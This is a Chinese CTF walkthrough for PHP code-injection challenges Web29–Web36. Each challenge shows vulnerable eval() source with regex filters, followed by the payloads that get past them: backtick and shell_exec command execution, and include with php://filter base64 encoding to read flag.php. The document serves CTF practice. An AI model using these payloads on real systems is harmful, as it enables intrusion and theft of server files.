Web29
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
eval函数
了解 eval函数之后
传入
?c=echo "Y2my";?>ctf <?php system('ls');
得到了flag 的位置
由于是 php,直接 cat flag.php 会被解析
所以 改为 include 包含一下,在编码
传入
?c=echo "Y2my"; ?>ctf <?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php
得到flag
Web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
相比 Web29 增加了过滤规则
首先传入
?c=echo "Y2my "; echo `ls`; ?>
查看flag位置
`` 在linux 会当成命令执行
当然也可以用 shell_exec();
?c=echo "Y2my "; echo shell_exec(‘ls’); ?>
传入
?c=echo "Y2my "; include($_GET['url']); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php
base64 解码
得到flag
Web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
增加了过滤
首先查看flag位置
?c=$y2my=1;echo/**/`ls`;?>
flag.php index.php
由于增加 ’ 单引号的过滤,所以还是用之前的payload
单引号改为双引号就行了
?c=$y2my=1;echo/**/`ls`;include($_GET["url"]);?>&url=php://filter/read=convert.base64-encode/resource=flag.php
flag.php index.php PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImZsYWd7YWNhMGY4YzEtMGQ3Ny00NTYzLTk0NjMtNDhkZjZmZjMwYWMyfSI7DQo=
转码得到flag
Web32
在看完 羽大佬的wp后,发现 include可以不用括号
这样一来就不需要考虑 被过滤的括号了
下图为其他不用括号的函数
图来自群大佬
Payload
?c=$y2my=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
Web33
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Web34
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
和33一样
Web35
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Web36
由于增加了过滤数字所以将1替换为字母
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php